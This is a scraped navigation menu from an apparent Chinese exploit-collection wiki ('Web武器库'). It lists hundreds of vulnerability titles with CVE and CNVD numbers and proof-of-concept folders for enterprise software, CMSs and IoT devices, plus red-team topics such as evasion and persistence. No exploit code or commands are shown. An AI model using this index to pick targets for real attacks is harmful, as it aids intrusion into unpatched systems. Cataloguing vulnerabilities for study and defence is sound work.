Web武器库

Thinkphp 2.X RCE漏洞

正在初始化搜索引擎

timlzh/webArmory

Home
Edge Sec Wiki
POChouse
PeiQi Wiki
Pentest Note
Qingy Wiki
Wgpsec
Bylibrary

Web武器库

timlzh/webArmory

Home
Edge Sec Wiki
Edge Sec Wiki
- Edge Security
  Edge Security
POChouse
POChouse
- Wiki
  Wiki
  - POChouse
  - Apache ActiveMQ
    Apache ActiveMQ
    
    Apache ActiveMQ
    
    ActiveMQ 反序列化漏洞（CVE 2015 5254）
    ActiveMQ 反序列化漏洞（CVE 2015 5254）
    
    ActiveMQ 反序列化漏洞（CVE 2015 5254）
    
    ActiveMQ任意文件写入漏洞（CVE 2016 3088）
    ActiveMQ任意文件写入漏洞（CVE 2016 3088）
    
    ActiveMQ任意文件写入漏洞（CVE 2016 3088）
    
    pocFiles
  - Apache Flink
    Apache Flink
    
    Apache Flink
    
    Apache Flink 1.9.1 Jar Upload RCE
    Apache Flink 1.9.1 Jar Upload RCE
    
    Apache Flink 1.9.1 Jar Upload RCE
    
    Apache Flink jobmanager 目录遍历（CVE 2020 17519）
    Apache Flink jobmanager 目录遍历（CVE 2020 17519）
    
    Apache Flink jobmanager 目录遍历（CVE 2020 17519）
    
    Apache Flink 文件上传和目录遍历（CVE 2020 17518）
    Apache Flink 文件上传和目录遍历（CVE 2020 17518）
    
    Apache Flink 文件上传和目录遍历（CVE 2020 17518）
    
    pocFiles
  - Apache Kylin
    Apache Kylin
    
    Apache Kylin
    
    命令注入漏洞（CVE 2020 13925）
    命令注入漏洞（CVE 2020 13925）
    
    命令注入漏洞（CVE 2020 13925）
  - Apache Shiro
    Apache Shiro
    
    Apache Shiro
    
    Shiro 550反序列化（CVE 2016 4437）
    Shiro 550反序列化（CVE 2016 4437）
    
    Shiro 550反序列化（CVE 2016 4437）
    
    pocFiles
    
    Shiro 721 Padding Oracle漏洞
    Shiro 721 Padding Oracle漏洞
    
    Shiro 721 Padding Oracle漏洞
    
    Shiro 权限绕过漏洞
    Shiro 权限绕过漏洞
    
    Shiro 权限绕过漏洞
  - Apache Solr
    Apache Solr
    
    Apache Solr
    
    Solr Velocity 注入远程命令执行漏洞 (CVE 2019 17558)
    Solr Velocity 注入远程命令执行漏洞 (CVE 2019 17558)
    
    Solr Velocity 注入远程命令执行漏洞 (CVE 2019 17558)
    
    pocFiles
    
    Solr 未授权上传漏洞（CVE 2020 13957）
    Solr 未授权上传漏洞（CVE 2020 13957）
    
    Solr 未授权上传漏洞（CVE 2020 13957）
    
    Solr 远程命令执行漏洞（CVE 2019 0193）
    Solr 远程命令执行漏洞（CVE 2019 0193）
    
    Solr 远程命令执行漏洞（CVE 2019 0193）
    
    pocFiles
  - Apache Spark
    Apache Spark
    
    Apache Spark
    
    Apache Spark 未授权访问漏洞
    Apache Spark 未授权访问漏洞
    
    Apache Spark 未授权访问漏洞
    
    RCE（CVE 2020 9480）
    RCE（CVE 2020 9480）
    
    RCE（CVE 2020 9480）
  - Apache Struts2
    Apache Struts2
    
    Apache Struts2
  - Apache Tomcat
    Apache Tomcat
    
    Apache Tomcat
    
    AJP 文件包含漏洞（CVE 2020 1938）
    AJP 文件包含漏洞（CVE 2020 1938）
    
    AJP 文件包含漏洞（CVE 2020 1938）
    
    pocFiles
  - Apereo CAS
    Apereo CAS
    
    Apereo CAS
    
    Apereo CAS 4.1 反序列化命令执行漏洞
    Apereo CAS 4.1 反序列化命令执行漏洞
    
    Apereo CAS 4.1 反序列化命令执行漏洞
    
    pocFiles
  - Cacti
    Cacti
    
    Cacti
    
    Cacti v1.2.8 RCE（CVE 2020 8813）
    Cacti v1.2.8 RCE（CVE 2020 8813）
    
    Cacti v1.2.8 RCE（CVE 2020 8813）
    
    pocFiles
  - Discuz
    Discuz
    
    Discuz
  - Drupal
    Drupal
    
    Drupal
    
    Drupal geddon 2 RCE（CVE 2018 7600）
    Drupal geddon 2 RCE（CVE 2018 7600）
    
    Drupal geddon 2 RCE（CVE 2018 7600）
    
    pocFiles
    
    Drupal 需要密码内核RCE（CVE 2018 7602）
    Drupal 需要密码内核RCE（CVE 2018 7602）
    
    Drupal 需要密码内核RCE（CVE 2018 7602）
    
    pocFiles
    
    SA CORE 2019 003 RCE (CVE 2019 6340)
    SA CORE 2019 003 RCE (CVE 2019 6340)
    
    SA CORE 2019 003 RCE (CVE 2019 6340)
    
    pocFiles
  - ECshop
    ECshop
    
    ECshop
    
    ECShop 2.7.3 RCE
    ECShop 2.7.3 RCE
    
    ECShop 2.7.3 RCE
  - Exchange
    Exchange
    
    Exchange
    
    RCE 普通用户（CVE 2020 17144）
    RCE 普通用户（CVE 2020 17144）
    
    RCE 普通用户（CVE 2020 17144）
    
    pocFiles
    
    RCE 需要域用户（CVE 2020 0688）
    RCE 需要域用户（CVE 2020 0688）
    
    RCE 需要域用户（CVE 2020 0688）
    
    pocFiles
    
    SSRF to RCE（CVE 2021 26855）
    SSRF to RCE（CVE 2021 26855）
    
    SSRF to RCE（CVE 2021 26855）
    
    pocFiles
  - F5 BIG IP
    F5 BIG IP
    
    F5 BIG IP
    
    BIG IP IQ 远程代码执行（CVE 2021 22986 ）
    BIG IP IQ 远程代码执行（CVE 2021 22986 ）
    
    BIG IP IQ 远程代码执行（CVE 2021 22986 ）
    
    TMUI 远程代码执行漏洞（CVE 2020 5902）
    TMUI 远程代码执行漏洞（CVE 2020 5902）
    
    TMUI 远程代码执行漏洞（CVE 2020 5902）
    
    pocFiles
  - FastAdmin
    FastAdmin
    
    FastAdmin
    
    FastAdmin 用户权限RCE
    FastAdmin 用户权限RCE
    
    FastAdmin 用户权限RCE
    
    pocFiles
  - Fastjson
    Fastjson
    
    Fastjson
    
    Fastjson 1.2.24 反序列化RCE
    Fastjson 1.2.24 反序列化RCE
    
    Fastjson 1.2.24 反序列化RCE
    
    pocFiles
    
    Fastjson 1.2.47 反序列化RCE
    Fastjson 1.2.47 反序列化RCE
    
    Fastjson 1.2.47 反序列化RCE
    
    Fastjson 1.2.68 反序列化RCE
    Fastjson 1.2.68 反序列化RCE
    
    Fastjson 1.2.68 反序列化RCE
  - Gitlab
    Gitlab
    
    Gitlab
    
    GitLab 邮箱信息泄露漏洞（CVE 2020 26413）
    GitLab 邮箱信息泄露漏洞（CVE 2020 26413）
    
    GitLab 邮箱信息泄露漏洞（CVE 2020 26413）
    
    pocFiles
    
    Gitlab 任意文件读取鸡肋（CVE 2020 10977）
    Gitlab 任意文件读取鸡肋（CVE 2020 10977）
    
    Gitlab 任意文件读取鸡肋（CVE 2020 10977）
    
    Gitlab 未授权RCE（CVE 2021 22192）
    Gitlab 未授权RCE（CVE 2021 22192）
    
    Gitlab 未授权RCE（CVE 2021 22192）
  - Harbor
    Harbor
    
    Harbor
    
    CVE 2019 16097 任意管理员注册漏洞
    CVE 2019 16097 任意管理员注册漏洞
    
    pocFiles
  - JBoss
    JBoss
    
    JBoss
    
    JBoss 5.x 6.x 反序列化漏洞（CVE 2017 12149）
    JBoss 5.x 6.x 反序列化漏洞（CVE 2017 12149）
    
    JBoss 5.x 6.x 反序列化漏洞（CVE 2017 12149）
    
    pocFiles
  - Jellyfin
    Jellyfin
    
    Jellyfin
    
    任意文件读取漏洞（CVE 2021 21402）
    任意文件读取漏洞（CVE 2021 21402）
    
    pocFiles
    
    任意文件读取漏洞（CVE 2021 21402）
  - Jenkins
    Jenkins
    
    Jenkins
    
    Jenkins 远程命令执行漏洞（CVE 2018 1000861）
    Jenkins 远程命令执行漏洞（CVE 2018 1000861）
    
    Jenkins 远程命令执行漏洞（CVE 2018 1000861）
    
    pocFiles
    
    Jenkins CI 远程代码执行漏洞（CVE 2017 1000353）
    Jenkins CI 远程代码执行漏洞（CVE 2017 1000353）
    
    Jenkins CI 远程代码执行漏洞（CVE 2017 1000353）
    
    pocFiles
  - Jira
    Jira
    
    Jira
    
    Jira 未授权SSRF（CVE 2019 8451）
    Jira 未授权SSRF（CVE 2019 8451）
    
    pocFiles
  - Joomla
    Joomla
    
    Joomla
    
    Joomla 3.4.6 RCE（CVE 2015 8562）
    Joomla 3.4.6 RCE（CVE 2015 8562）
    
    pocFiles
    
    Joomla 3.7.0 SQL注入(CVE 2017 8917)
    Joomla 3.7.0 SQL注入(CVE 2017 8917)
    
    Joomla 3.7.0 SQL注入(CVE 2017 8917)
    
    pocFiles
    
    Joomla 3.9.17 后台RCE（CVE 2020 11890）
    Joomla 3.9.17 后台RCE（CVE 2020 11890）
    
    Joomla 3.9.17 后台RCE（CVE 2020 11890）
    
    pocFiles
    
    Joomla 3.9.24 普通管理员RCE（CVE 2021 23132 ）
    Joomla 3.9.24 普通管理员RCE（CVE 2021 23132 ）
    
    Joomla 3.9.24 普通管理员RCE（CVE 2021 23132 ）
    
    pocFiles
  - Kibana
    Kibana
    
    Kibana
    
    CVE 2019 7609
    CVE 2019 7609
    
    CVE 2019 7609
    
    pocFiles
  - Nacos
    Nacos
    
    Nacos
    
    Nacos未授权访问（CVE 2020 19676）
    Nacos未授权访问（CVE 2020 19676）
    
    Nacos未授权访问（CVE 2020 19676）
    
    pocFiles
  - Nexus
    Nexus
    
    Nexus
    
    Nexus Repository Manager 3 访问控制缺失及远程代码执行漏洞（CVE 2019 7238）
    Nexus Repository Manager 3 访问控制缺失及远程代码执行漏洞（CVE 2019 7238）
    
    Nexus Repository Manager 3 访问控制缺失及远程代码执行漏洞（CVE 2019 7238）
    
    pocFiles
    
    Nexus Repository Manager 3 远程命令执行漏洞（CVE 2020 10204）
    Nexus Repository Manager 3 远程命令执行漏洞（CVE 2020 10204）
    
    Nexus Repository Manager 3 远程命令执行漏洞（CVE 2020 10204）
    
    pocFiles
  - SAP
    SAP
    
    SAP
    
    SAP NetWeaver AS JAVA 任意用户添加
    SAP NetWeaver AS JAVA 任意用户添加
    
    SAP NetWeaver AS JAVA 任意用户添加
    
    pocFiles
  - Spring
    Spring
    
    Spring
    
    Spring
    
    Spring Boot Actuator 未授权访问
    Spring Boot Actuator 未授权访问
    
    Spring Boot Actuator 未授权访问
    
    Spring env rce Server
    Spring env rce Server
    
    pocFiles
    
    Spring Cloud Config Server目录遍历（CVE 2020 5410）
    Spring Cloud Config Server目录遍历（CVE 2020 5410）
    
    Spring Cloud Config Server目录遍历（CVE 2020 5410）
    
    Spring Data Commons 远程命令执行（CVE 2018 1273）
    Spring Data Commons 远程命令执行（CVE 2018 1273）
    
    Spring Data Commons 远程命令执行（CVE 2018 1273）
    
    pocFiles
  - ThinkCMF
    ThinkCMF
    
    ThinkCMF
  - ThinkPHP
    ThinkPHP
    
    ThinkPHP
  - Vmware
    Vmware
    
    Vmware
    
    VMware View Planner 未授权RCE漏洞（CVE 2021 21978）
    VMware View Planner 未授权RCE漏洞（CVE 2021 21978）
    
    VMware View Planner 未授权RCE漏洞（CVE 2021 21978）
    
    pocFiles
    
    Get webshell
    Get webshell
    
    pocFiles
    
    VMware vCenter Server未授权RCE漏洞（CVE 2021 21972）
    VMware vCenter Server未授权RCE漏洞（CVE 2021 21972）
    
    VMware vCenter Server未授权RCE漏洞（CVE 2021 21972）
    
    pocFiles
    
    Payload
    Payload
    
    pocFiles
    
    Linux
    Linux
    
    pocFiles
    
    VMware vCenter Server远程代码执行漏洞（CVE 2021 21985）
    VMware vCenter Server远程代码执行漏洞（CVE 2021 21985）
    
    VMware vCenter Server远程代码执行漏洞（CVE 2021 21985）
    
    pocFiles
    
    VMware vCenter任意文件读取漏洞
    VMware vCenter任意文件读取漏洞
    
    VMware vCenter任意文件读取漏洞
    
    pocFiles
    
    VMware vRealize Operations Manager SSRF（CVE 2021 21975）
    VMware vRealize Operations Manager SSRF（CVE 2021 21975）
    
    VMware vRealize Operations Manager SSRF（CVE 2021 21975）
  - Weblogic
    Weblogic
    
    Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109
    
    Weblogic
    
    Weblogic
    
    [CVE 2017 10271] XMLDecoder反序列化
    [CVE 2017 10271] XMLDecoder反序列化
    
    [CVE 2017 10271] XMLDecoder反序列化
    
    [CVE 2019 2725] wls反序列化
    [CVE 2019 2725] wls反序列化
    
    [CVE 2019 2725] wls反序列化
    
    [CVE 2020 14644] 远程命令执行
    [CVE 2020 14644] 远程命令执行
    
    [CVE 2020 14644] 远程命令执行
    
    [CVE 2020 14645] T3反序列化
    [CVE 2020 14645] T3反序列化
    
    [CVE 2020 14645] T3反序列化
    
    [CVE 2020 14756] IIOP T3反序列化
    [CVE 2020 14756] IIOP T3反序列化
    
    [CVE 2020 14756] IIOP T3反序列化
    
    [CVE 2020 14882] 未授权命令执行
    [CVE 2020 14882] 未授权命令执行
    
    [CVE 2020 14882] 未授权命令执行
    
    [CVE 2020 2551] IIOP反序列化
    [CVE 2020 2551] IIOP反序列化
    
    [CVE 2020 2551] IIOP反序列化
    
    [CVE 2020 2555] T3反序列化
    [CVE 2020 2555] T3反序列化
    
    [CVE 2020 2555] T3反序列化
    
    [CVE 2020 2883] T3反序列化
    [CVE 2020 2883] T3反序列化
    
    [CVE 2020 2883] T3反序列化
  - WordPress
    WordPress
    
    WordPress
    
    pocFiles
  - XXLjob
    XXLjob
    
    XXLjob
    
    xxl job API接口未授权访问RCE
    xxl job API接口未授权访问RCE
    
    pocFiles
    
    xxl job API接口未授权访问RCE
  - Zabbix
    Zabbix
    
    Zabbix
  - [+] 协同办公OA系统
    [+] 协同办公OA系统
    
    [+] 协同办公OA系统
    
    Ecology 泛微OA
    Ecology 泛微OA
    
    Bsh远程代码执行（CNVD 2019 32204）
    Bsh远程代码执行（CNVD 2019 32204）
    
    Bsh远程代码执行（CNVD 2019 32204）
    
    pocFiles
    
    V9 任意文件上传
    V9 任意文件上传
    
    V9 任意文件上传
    
    weaver.common.Ctrl 任意文件上传
    weaver.common.Ctrl 任意文件上传
    
    pocFiles
    
    weaver.common.Ctrl 任意文件上传
    
    反序列化
    反序列化
    
    反序列化
    
    Landray 蓝凌OA
    Landray 蓝凌OA
    
    蓝凌OA EKP 后台SQL注入漏洞 CNVD-2021-01363
    
    蓝凌OA SSRF+JNDI远程命令执行
    
    蓝凌OA 任意文件写入漏洞
    
    Seeyon 致远OA
    Seeyon 致远OA
    
    A8 FastJson反序列化RCE
    A8 FastJson反序列化RCE
    
    A8 FastJson反序列化RCE
    
    Session 任意文件上传
    Session 任意文件上传
    
    Session 任意文件上传
    
    EXP
    EXP
    
    pocFiles
    
    ajax.do任意文件上传（ CNVD 2021 01627）
    ajax.do任意文件上传（ CNVD 2021 01627）
    
    ajax.do任意文件上传（ CNVD 2021 01627）
    
    任意文件下载（CNVD 2020 62422）
    任意文件下载（CNVD 2020 62422）
    
    任意文件下载（CNVD 2020 62422）
    
    Tongda 通达OA
    Tongda 通达OA
    
    通达OA v11.2后台任意文件上传漏洞
    
    通达OA v11.6 任意文件删除&RCE
    
    通达OA v11.7后台SQL注入
    
    通达OA v11.7 在线用户登录漏洞
    
    通达OA v11.8 后台文件包含存储型XSS漏洞
    
    通达OA v11.8 后台文件包含命令执行漏洞
    
    通达OA v11.8 后台文件包含存储型XSS漏洞
    
    通达OA v11.9 后台SQL注入漏洞
    
    通达OA v11.x-v11.5任意用户登录
    
    通达OA部分漏洞信息整合
    
    POC
    POC
    
    pocFiles
    
    Zentao 禅道
    Zentao 禅道
    
    pocFiles
    
    Zentao(禅道)
    
    禅道 11.6版本 SQL注入漏洞
    
    禅道 11.6版本任意文件读取漏洞
    
    禅道小于12.4.2 文件上传漏洞 CNVD-C-2020-121325
  - [+] 编辑器上传漏洞
    [+] 编辑器上传漏洞
    
    [+] 编辑器上传漏洞
  - [+] 网络&安全设备
    [+] 网络&安全设备
    
    设备默认口令
  - phpMyAdmin
    phpMyAdmin
    
    phpMyAdmin
  - 骑士CMS
    骑士CMS
    
    骑士CMS
    
    骑士CMS远程代码执行
    骑士CMS远程代码执行
    
    骑士CMS远程代码执行
PeiQi Wiki
PeiQi Wiki
- Ctf
  Ctf
  - Blockchain
    Blockchain
    
    区块链
    
    Ethernaut
    Ethernaut
    
    3.Coin Flip
    
    6.Delegation
    
    1.Fallback
    
    2.Fallout
    
    7.Force
    
    0.Hello Ethernaut
    
    4.Telephone
    
    5.Token
    
    基础知识
    基础知识
    
    Solidity语言
    
    关于区块链
    
    工具安装与使用
  - Crypto
    Crypto
    
    Crypto
  - Misc
    Misc
    
    Misc
    
    压缩包破解
    压缩包破解
    
    伪加密
    
    密码破解
    
    明文攻击
    
    图片隐写
    图片隐写
    
    LSB隐写
    
    附加式隐写
    
    文件修复
    文件修复
    
    文件结构
    
    标识修复
    
    高度修复
    
    音频隐写
    音频隐写
    
    MP3隐写
    
    波形隐写
    
    频谱隐写
  - Pwn
    Pwn
    
    Pwn
  - Reverse
    Reverse
    
    Reverse
  - Web
    Web
    
    Web
- Redteam
  Redteam
  - Blueteam
    Blueteam
    
    蓝队防守
  - Codeaudit
    Codeaudit
    
    代码审计
    
    Php
    Php
    
    伪协议
    
    命令行模式
    
    弱类型比较
  - Defensetoevade
    Defensetoevade
    
    防御规避
  - Informationcollection
    Informationcollection
    
    信息收集
  - Networkofmobile
    Networkofmobile
    
    内网移动
  - Permissionstomaintain
    Permissionstomaintain
    
    权限维持
  - Privilegeescalation
    Privilegeescalation
    
    权限提升
    
    Linux
    Linux
    
    SUDO
    
    SUID
  - Vulnerability
    Vulnerability
    
    漏洞挖掘
    
    Logicalloopholes
    Logicalloopholes
    
    邮箱轰炸
    
    验证码安全
    
    Unauthorized
    Unauthorized
    
    ClickHouse 8123端口
    
    Docker 2375端口
    
    Memcache 11211端口
    
    MongoDB 27017端口
    
    Redis 6379端口
    
    Rsync 873端口
    
    Zookeeper 2181端口
- Wiki
  Wiki
  - Cms
    Cms
    
    CMS漏洞
    
    AspCMS
    AspCMS
    
    AspCMS commentList.asp SQL注入漏洞
    
    CmsEasy
    CmsEasy
    
    CmsEasy crossall_act.php SQL注入漏洞
    
    CmsEasy language_admin.php 后台命令执行漏洞
    
    CmsEasy update_admin.php 后台任意文件上传漏洞
    
    CxCMS
    CxCMS
    
    CxCMS Resource.ashx 任意文件读取漏洞
    
    DedeCMS
    DedeCMS
    
    DedeCMS common.func.php 远程命令执行漏洞
    
    DiscuzX
    DiscuzX
    
    Discuz!X 3.4 admincp_setting.php 后台SQL注入漏洞
    
    DocCMS
    DocCMS
    
    DocCMS keyword SQL注入漏洞
    
    Ke361
    Ke361
    
    Ke361 AuthManagerController.class.php 后台SQL注入漏洞
    
    Ke361 DistrictController.class.php 后台SQL注入漏洞 CNVD-2021-25002
    
    Ke361 GoodsController.class.php SSRF漏洞
    
    Ke361 MenuController.class.php 后台SQL注入漏洞 CNVD-2021-25002
    
    Ke361 TopicController.class.php SQL注入漏洞 CNVD-2017-04380
    
    OKLite
    OKLite
    
    OKLite 1.2.25 后台插件安装任意文件上传
    
    OKLite 1.2.25 后台模块导入任意文件上传 CVE-2019-16131
    
    OKLite 1.2.25 后台风格模块任意文件删除 CVE-2019-16132
    
    OpenSNS
    OpenSNS
    
    OpenSNS Application ShareController.class.php 远程命令执行漏洞
    
    OpenSNS AuthorizeController.class.php 后台远程命令执行漏洞
    
    OpenSNS ChinaCityController.class.php SQL注入漏洞
    
    OpenSNS CurlModel.class.php SSRF漏洞
    
    OpenSNS ThemeController.class.php 后台任意文件上传漏洞
    
    OpenSNS ThemeController.class.php 后台任意文件下载漏洞
    
    PbootCMS
    PbootCMS
    
    PbootCMS domain SQL注入漏洞
    
    PbootCMS ext_price SQL注入漏洞
    
    PbootCMS search SQL注入漏洞
    
    Pd CMS
    Pd CMS
    
    Pd-CMS Shiro默认密钥远程命令执行漏洞
    
    PigCMS
    PigCMS
    
    PigCMS action_flashUpload 任意文件上传漏洞
    
    WeiPHP
    WeiPHP
    
    WeiPHP3.0 session_id 任意文件上传漏洞
    
    WeiPHP5.0 bind_follow SQL注入漏洞
    
    WeiPHP5.0 download_imgage 前台文件任意读取 CNVD-2020-68596
    
    WeiPHP5.0 任意用户Cookie伪造 CNVD-2021-09693
    
    YzmCMS
    YzmCMS
    
    YzmCMS 后台采集模块 SSRF漏洞
    
    ZZZCMS
    ZZZCMS
    
    ZZZCMS parserSearch 远程命令执行漏洞
    
    Emlog
    Emlog
    
    emlog widgets.php 后台SQL注入漏洞
    
    发货100
    发货100
    
    发货100 M_id SQL注入漏洞 CNVD-2021-30193
    
    极致CMS
    极致CMS
    
    极致CMS alipay_return_pay SQL注入漏洞
    
    极致CMS 后台文件编辑插件后台任意文件写入漏洞
    
    狮子鱼CMS
    狮子鱼CMS
    
    狮子鱼CMS ApiController.class.php SQL注入漏洞
    
    狮子鱼CMS ApigoodController.class.php SQL注入漏洞
    
    狮子鱼CMS image_upload.php 任意文件上传
    
    狮子鱼CMS wxapp.php 任意文件上传漏洞
    
    禅道
    禅道
    
    禅道 11.6 api-getModel-api-getMethod-filePath 任意文件读取漏洞
    
    禅道 11.6 api-getModel-api-sql-sql 后台SQL注入漏洞
    
    禅道 11.6 api-getModel-editor-save-filePath 任意文件写入漏洞
    
    禅道 12.4.2 后台任意文件上传漏洞 CNVD-C-2020-121325
    
    禅道 16.5 router.class.php SQL注入漏洞
    
    齐博CMS
    齐博CMS
    
    齐博CMS V7 job.php 任意文件读取漏洞
  - Frame
    Frame
    
    开发框架漏洞
    
    Laravel
    Laravel
    
    Laravel Debug模式 _ignition 远程代码执行漏洞 CVE-2021-3129
    
    Laravel Filemanager插件 download 任意文件读取漏洞 CVE-2022-40734
    
    Laravel .env 配置文件泄露 CVE-2017-16894
    
    MotionEye
    MotionEye
    
    MotionEye 视频监控组件 list 信息泄漏洞 CVE-2022-25568
    
    PHPUnit
    PHPUnit
    
    PHPUnit eval-stdin.php 远程命令执行漏洞 CVE-2017-9841
    
    Rails
    Rails
    
    Rails Accept 任意文件读取漏洞 CVE-2019-5418
    
    Rails sprockets 任意文件读取漏洞 CVE-2018-3760
    
    SpringBoot
    SpringBoot
    
    Spring Cloud Function SPEL 远程命令执行漏洞
    
    Spring Cloud Gateway表达式注入远程命令执行漏洞 CVE-2022-22947
    
    Spring Core JDK9+ Spring4Shell远程命令执行漏洞 CVE-2022-22965
    
    ThinkPHP
    ThinkPHP
    
    ThinkPHP LoadLangPack lang 任意文件包含漏洞
    
    jQuery
    jQuery
    
    jQuery XSS漏洞 CVE-2020-11022
  - Iot
    Iot
    
    网络设备漏洞
    
    ACTI
    ACTI
    
    ACTI 视频监控 images 任意文件读取漏洞
    
    Amcrest
    Amcrest
    
    Amcrest IP Camera Web Sha1Account1 账号密码泄漏漏洞 CVE-2017-8229
    
    Cisco
    Cisco
    
    Cisco ASA设备任意文件读取漏洞 CVE-2020-3452
    
    Cisco ASA设备任意文件删除漏洞 CVE-2020-3187
    
    Cisco HyperFlex HX storfs-asup 远程命令执行漏洞 CVE-2021-1497
    
    Cisco HyperFlex HX upload 任意文件上传漏洞 CVE-2021-1499
    
    Crestron
    Crestron
    
    Crestron aj.html 账号密码泄漏漏洞 CVE-2022-23178
    
    D Link
    D Link
    
    D-LINK DAP-2020 webproc 任意文件读取漏洞 CVE-2021-27250
    
    D-Link DAR-8000 importhtml.php 远程命令执行漏洞
    
    D-Link DCS系列监控账号密码信息泄露漏洞 CVE-2020-25078
    
    D-Link DSL-28881A FTP配置错误 CVE-2020-24578
    
    D-Link DSL-28881A 信息泄露 CVE-2020-24577
    
    D-Link DSL-28881A 未授权访问 CVE-2020-24579
    
    D-Link DSL-28881A 远程命令执行 CVE-2020-24581
    
    D-Link DSR-250N SQL注入漏洞
    
    D-Link Dir-645 getcfg.php 账号密码泄露漏洞 CVE-2019-17506
    
    D-Link ShareCenter DNS-320 system_mgr.cgi 远程命令执行漏洞
    
    DVR
    DVR
    
    DVR 登录绕过漏洞 CVE-2018-9995
    
    DrayTek
    DrayTek
    
    DrayTek企业网络设备远程命令执行 CVE-2020-8515
    
    Finetree
    Finetree
    
    Finetree 5MP 摄像机 user_pop.php 任意用户添加漏洞 CNVD-2021-42372
    
    Fortinet
    Fortinet
    
    Fortinet FortiOS admin 远程命令执行漏洞 CVE-2022-40684
    
    Fortinet FortiWeb sslvpn_websession 路径遍历漏洞 CVE-2018-13379
    
    H3C
    H3C
    
    H3C SecPath下一代防火墙 sys_dia_data_check 任意文件下载漏洞
    
    HIKVISION
    HIKVISION
    
    HIKVISION DS/IDS/IPC 等设备远程命令执行漏洞 CVE-2021-36260
    
    HIKVISION iVMS-8700综合安防管理平台 download 任意文件下载漏洞
    
    HIKVISION iVMS-8700综合安防管理平台 upload.action 任意文件上传
    
    HIKVISION 流媒体管理服务器 user.xml 账号密码泄漏漏洞
    
    HIKVISION 流媒体管理服务器后台任意文件读取漏洞 CNVD-2021-14544
    
    HIKVISION 综合安防管理平台 applyCT Fastjson远程命令执行漏洞
    
    HIKVISION 联网网关 downdb.php 任意文件读取漏洞
    
    HIKVISION 视频编码设备接入网关 $DATA 任意文件读取
    
    HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞
    
    HiKVISION 综合安防管理平台 env 信息泄漏漏洞
    
    HiKVISION 综合安防管理平台 files 任意文件上传漏洞
    
    HiKVISION 综合安防管理平台 report 任意文件上传漏洞
    
    JCG
    JCG
    
    JCG JHR-N835R 后台命令执行漏洞
    
    KEDACOM
    KEDACOM
    
    KEDACOM数字系统接入网关任意文件读取漏洞
    
    Kyan
    Kyan
    
    Kyan 网络监控设备 hosts 账号密码泄露漏洞
    
    Kyan 网络监控设备 license.php 远程命令执行漏洞
    
    Kyan 网络监控设备 module.php 远程命令执行漏洞
    
    Kyan 网络监控设备 run.php 远程命令执行漏洞
    
    Kyan 网络监控设备 time.php 远程命令执行漏洞
    
    MSA
    MSA
    
    MSA 互联网管理网关 msa 任意文件下载漏洞
    
    MagicFlow
    MagicFlow
    
    MagicFlow 防火墙网关 main.xp 任意文件读取漏洞
    
    Milesight
    Milesight
    
    Milesight VPN server.js 任意文件读取漏洞
    
    NetMizer
    NetMizer
    
    NetMizer 日志管理系统 cmd.php 远程命令执行漏洞
    
    NetMizer 日志管理系统 data 目录遍历漏洞
    
    NetMizer 日志管理系统 main.html 登录绕过漏洞
    
    Panabit
    Panabit
    
    Panabit Panalog sy_addmount.php 远程命令执行漏洞
    
    Panabit iXCache date_config 后台命令执行漏洞
    
    Sapido
    Sapido
    
    Sapido 多款路由器远程命令执行漏洞
    
    Selea
    Selea
    
    Selea OCR-ANPR摄像机 SeleaCamera 任意文件读取漏洞
    
    Selea OCR-ANPR摄像机 get_file.php 任意文件读取漏洞
    
    SonicWall
    SonicWall
    
    SonicWall SSL-VPN 远程命令执行漏洞
    
    TOTOLink
    TOTOLink
    
    TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084
    
    TVT数码科技
    TVT数码科技
    
    TVT数码科技 NVMS-1000 路径遍历漏洞 CVE-2019-20085
    
    Teleport堡垒机
    Teleport堡垒机
    
    Teleport堡垒机 do-login 任意用户登录漏洞
    
    Teleport堡垒机 get-file 后台任意文件读取漏洞
    
    Telesquare
    Telesquare
    
    Telesquare SDT-CW3B1 admin.cgi 远程命令执行漏洞 CVE-2021-46422
    
    Tenda
    Tenda
    
    Tenda 11N无线路由器 Cookie 越权访问漏洞
    
    Tenda W15E企业级路由器 RouterCfm.cfg 配置文件泄漏漏洞
    
    ZeroShell
    ZeroShell
    
    ZeroShell 3.9.0 远程命令执行漏洞 CVE-2019-12725
    
    Zyxel
    Zyxel
    
    Zyxel NBG2105 身份验证绕过 CVE-2021-3297
    
    Zyxel USG FLEX handler 远程命令执行漏洞 CVE-2022-30525
    
    iKuai
    iKuai
    
    iKuai 流控路由 SQL注入漏洞
    
    rConfig
    rConfig
    
    rConfig ajaxArchiveFiles.php 后台远程命令执行漏洞
    
    rConfig ajaxEditTemplate.php 后台远程命令执行漏洞
    
    rConfig useradmin.inc.php 信息泄露漏洞
    
    rConfig userprocess.php 任意用户创建漏洞
    
    中科网威
    中科网威
    
    中科网威下一代防火墙控制系统 download.php 任意文件读取漏洞
    
    佑友
    佑友
    
    佑友防火墙后台命令执行漏洞
    
    华为
    华为
    
    Huawei DG8045 deviceinfo 信息泄漏漏洞
    
    Huawei HG659 lib 任意文件读取漏洞
    
    华夏创新
    华夏创新
    
    华夏创新 LotWan广域网优化系统 check_instance_state.php 远程命令执行漏洞
    
    华夏创新 LotWan广域网优化系统 static_arp.php 远程命令执行漏洞
    
    华夏创新 LotWan广域网优化系统 static_arp_del.php SQL注入漏洞
    
    博华网龙
    博华网龙
    
    博华网龙防火墙 cmd.php 远程命令执行漏洞(OEM)
    
    博华网龙防火墙 users.xml 未授权访问
    
    大华
    大华
    
    大华城市安防监控系统平台管理 attachment_downloadByUrlAtt.action 任意文件下载漏洞
    
    大华智慧园区综合管理平台 getFaceCapture SQL注入漏洞
    
    大华智慧园区综合管理平台 user_save.action 任意文件上传漏洞
    
    大华智慧园区综合管理平台 video 任意文件上传漏洞
    
    奇安信
    奇安信
    
    网康 NS-ASG安全网关 index.php 远程命令执行漏洞
    
    网康下一代防火墙 HeartBeat.php 远程命令执行漏洞
    
    网御 ACM上网行为管理系统 bottomframe.cgi SQL注入漏洞
    
    网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞
    
    网神 SecIPS 3600 debug_info_export 任意文件下载漏洞
    
    网神 SecSSL 3600安全接入网关系统未授权访问漏洞
    
    宇视科技
    宇视科技
    
    浙江宇视科技网络视频录像机 ISC LogReport.php 远程命令执行漏洞
    
    安恒
    安恒
    
    安恒明御WEB应用防火墙 report.php 任意用户登录漏洞
    
    安恒明御运维审计与风险控制系统 xmlrpc.sock 任意用户添加漏洞
    
    宏电
    宏电
    
    宏电 H8922 Telnet后门漏洞 CVE-2021-28149
    
